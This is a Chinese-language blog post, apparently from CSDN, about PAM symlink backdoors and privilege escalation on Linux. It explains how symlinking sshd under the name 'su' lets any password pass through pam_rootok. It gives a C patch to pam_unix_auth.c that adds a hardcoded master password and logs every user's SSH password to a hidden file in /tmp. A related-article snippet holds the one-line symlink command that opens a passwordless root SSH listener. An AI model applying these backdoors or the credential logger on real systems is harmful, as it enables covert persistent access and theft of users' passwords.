PAM软连接提权

最新推荐文章于 2024-08-25 12:26:45 发布
最新推荐文章于 2024-08-25 12:26:45 发布
阅读量215 收藏 3
点赞数 2
文章标签: 网络 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50296568/article/details/141449002
版权

文章目录

概要

PAM软链接提权利用的原理主要依赖于PAM(可插拔认证模块)配置文件的特性。具体来说,它利用了以下几个关键点:

PAM认证机制:PAM允许系统管理员通过配置文件灵活地管理用户认证过程。在SSH服务中,如果启用了PAM认证,系统会在用户登录时调用PAM模块进行身份验证。
软链接的使用:攻击者可以创建一个指向sshd文件的软链接,并将其命名为su(或其他名称)。当SSH服务启动时,它会根据PAM配置文件查找对应的模块。
pam_rootok.so模块:pam_rootok.so主要作用是使得uid为0的用户,即root用户可以直接通过认证而不需要输入密码。
PAM配置文件的控制:在PAM配置文件中,如果控制标志设置为sufficient,那么只要pam_rootok模块检测到用户的UID为0(即root用户),就会允许认证成功。这意味着即使输入了错误的密码,只要满足UID为0的条件,用户就可以获得root权限。
绕过正常验证:通过这种方式,攻击者可以绕过正常的密码验证,利用软链接实现提权,从而获得对系统的控制。

PAM软连接

1.可以查看 /etc/ssh/sshd_config 文件的UsePAM设置。来确认是否开启PAM认证。
2.修改PAM配置文件
auth required pam_securetty.so//要求在安全终端上进行身份验证。
auth required pam_unix.so shadow nullok//使用Unix认证,允许空密码(但并不推荐)。
auth required pam_nologin.so//检查是否存在nologin文件,防止不允许的用户登录。
account required pam_unix.so//用于账户管理的Unix认证。
password required pam_cracklib.so retry=3//使用密码复杂性检查,允许用户最多重试3次。
password required pam_unix.so shadow nullok use_authtok//用于更新密码的Unix认证,允许空密码,使用先前的身份验证令牌。
session required pam_unix.so//处理用户会话的相关操作。
3.将PAM配置文件中控制标志为sufficient,更改pam_rootok模块检测uid为0(root)

也可以修改配置,创建后门
修改配置:Linux-PAM/modules/pam_unix/pam_unix_auth.c配置后门

/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
if(strcmp("hackers",p)==0){return PAM_SUCCESS;}    //后门密码
    if(retval == PAM_SUCCESS){    
           FILE * fp;    
           fp = fopen("/tmp/.sshlog", "a");//SSH登录用户密码保存位置
           fprintf(fp, "%s : %s\n", name, p);    
           fclose(fp);} 
name = p = NULL;
B1ackMa9ic
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux——账号安全、su切换用户、PAM认证模块、sudo提权、开关机安全控制
weixin_51613313的博客
12-03 958
系统安全与运行一、账号安全1.1 系统账号清理1.1.1 禁止账号登录系统1.1.2 锁定长期不使用的账号1.1.3 删除无用的账号1.1.4 锁定账号文件1.1.5 清除用户的密码1.2 密码安全控制1.2.1 修改用户账号密码有效期1.2.2 设定用户账号失效期 一、账号安全 1.1 系统账号清理 1.1.1 禁止账号登录系统 将非登录用户的Shell设为/sbin/nologin usermod -s /sbin/nologin 用户名 示例:禁止“lisi”用户登录 1.1.2 锁定长期不使用
主机安全之Linux本地提权
systemino的博客
11-08 1760
0x00、前言 Linux本地提权在入侵过程中起到重要的作用。当黑客通过webshell等方式获取到低权限的用户的时候,需要高级权限才能完全控制目标主机,这时候本地提权就起到作用了。在自适应安全横行安全圈的今天,本地提权也是攻击链检测锚点的重要组成部分。 0x01、本地提权途径分析 1、漏洞提权 最主要的提权方式是本地linux漏洞导致的提权。 2015年~2019年OSKTV本地提权的...
Linux账号安全控制和sudo提权
Guiled7的博客
11-23 3756
Linux账号安全控制和sudo提权 一、账号安全控制 系统账号清理 将非登陆用户的Shell设为/sbin/nologin或者/bin/falsh usermod -s /sbin/nologin 用户名 锁定长期不使用的账号 usermod -L 用户名 锁定用户账户 passwd -l 用户名 锁定用户密码 passwd -S 用户名 查看用户状态 删除无用的账号 userdel -r 用户名
PAM从入门到精通(二)
phmatthaus的专栏
10-16 470
PAM从入门到精通(二)
pam_mysql怎么用_pam_mysql连接mysql数据库问题
weixin_31146939的博客
01-20 232
/var/log/secure中提示错误如下:wwwvsftpd:pam_mysql-MySQLerror(Can'tconnecttolocalMySQLserverthroughsocket'/var/lib/mysql/mysql.sock'(13))其他方式连接正常,PHP程序和jsp程序.../var/log/secure中提示错误如下:www vsftpd: pam_mysql - M...
SSH软连接后门
weixin_45209228的博客
03-13 361
SSH软连接后门
linux pam 原理,Linux的一个后门引起对PAM的探究
weixin_42224303的博客
05-14 198
1.1原由html今天在搜索关于Linux下的后门姿式时,发现一条命令以下:软连接后门:linux1ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=5555;经典后门。直接对sshd创建软链接,以后用任意密码登陆便可。sshroot@x.x.x.x-p5555这个是你们也常常会用到的命令,可是在好奇心的驱使下,为何任意密码就能够了?因而搜索了相关的资料...
linux pam 解锁_linux中pam模块
weixin_28335283的博客
12-24 415
一、pam简介Linux-PAM(linux可插入认证模块)是一套共享库,使本地系统管理员可以随意选择程序的认证方式. 换句话说,不用(重新编写)重新编译一个包含PAM功能的应用程序,就可以改变它使用的认证机制. 这种方式下,就算升级本地认证机制,也不用修改程序.PAM使用配置/etc/pam.d/下的文件,来管理对程序的认证方式.应用程序 调用相应的配置文件,从而调用本地的认证模块.模块放置在/...
linux pam 版本号,Linux中pam板块详解
weixin_39935654的博客
05-15 788
pam简介 Linux-PAM(linux可插入认证板块)是一套共享库,使本地系统管理员可以随便选择程序的认证方式。换句话说,不使用重新编译一个包含PAM功能的应使用程序,即可以改变它用的认证机制。这种方式下,就算更新本地认证机制,也不使用修改程序. PAM用配置/etc/pam.d/下的文件,来管理对程序的认证方式.应使用程序 调使用相应的配置文件,从而调使用本地的认证板块.板块放置在/lib/...
MINI-PAM操作手册.pdf
01-22
5. **电源连接**:严格按照操作手册指引进行电源连接,避免在仪器开机状态下接入外接电源。 6. **光导纤维**:避免过度弯曲光导纤维以防止损坏。 7. **光纤安全**:切勿将光纤末端对着眼睛,以免强光造成眼睛伤害。 ...
pam-MySQL-master.zip
11-29
PAM与MySQL的整合】 PAM(Pluggable Authentication Modules)是Linux系统中的一个核心组件,它允许管理员灵活地配置系统认证策略。PAM模块化的设计使得在多个服务之间共享认证逻辑变得简单,比如登录、SFTP、SSH...
基于PAM4调制的400G光模块
02-19
FR8和LR8使用8个波长,每个50G PAM4,覆盖2km和10km距离,而2xFR4将8个激光器分为4个波长的两组,适用于2个200G连接。 - **4x100G PAM4**: 采用4条通道,每通道100G PAM4,分为多光纤和双光纤两类。多光纤类型如DR4...
centos 6 安装vsftpd与PAM虚拟用户的方法
09-15
PAM(Pluggable Authentication Modules)则提供了一种灵活的方式来管理不同服务的认证过程。在本文中,我们将详细介绍如何在CentOS 6上安装和配置VSFTPD,以及使用PAM虚拟用户的方法。 首先,通过`yum`包管理器...
vsftpd pam验证
07-22
【vsftpd pam验证】是FTP(File Transfer Protocol)服务器软件vsftpd(Very Secure FTP Daemon)中的一种安全验证方式。PAM(Pluggable Authentication Modules)是Linux系统中的一个模块化认证框架,允许系统管理...
MPLS相关实验
2302_78454622的博客
08-20 594
4、R1上使用静态,R7上运行rip协议,R8上运行ospf协议。3、在R2、R3、R4、R5、R6上运行MPLS。2、R3、R4、R5、R6运行ospf。1、合理利用IP地址进行分配。一、实验拓扑图以及实验要求。一、实验拓扑图以及实验要求。
浏览器发送HTTP请求的过程
最新发布
学Python的小白!
08-25 941
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
哪些类型的企业需要开展TPM管理培训?
tianxingjian713的博客
08-23 877
例如汽车制造企业、电子制造企业等,这些企业的生产线通常由大量高精度的自动化设备组成,一旦设备出现故障,可能会导致整个生产线停产,造成巨大的经济损失。开展TPM管理培训可以提高员工对设备的维护和管理能力,延长设备的使用寿命,降低设备维修成本,提高物流服务的效率和质量。通过开展TPM管理培训,让设备操作人员、维护人员和管理人员共同参与设备维护,实现设备的零故障运行,从而提高企业的竞争力。通过开展TPM管理培训,让员工了解设备的运行原理和风险点,加强设备的日常巡检和维护,提高设备的安全性和可靠性。
系统编程 网络 http协议
qq_69971969的博客
08-24 422
--------------------------------------表示了资源所在的路径。意思:域名解析=>把对应的域名解析为对应的ip。<协议>://<主机>:<端口>/<路径>万维网:http解决万维网之间互联互通。http:应用层协议,底层是tcp协议。http协议------应用层的协议。1.如何在万维网中表示一个资源?http协议加密:tls,ssl。计算机web端网络只能看到文字。<http>只是协议的一种。html 超文本标记语言。http 超文本传输协议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值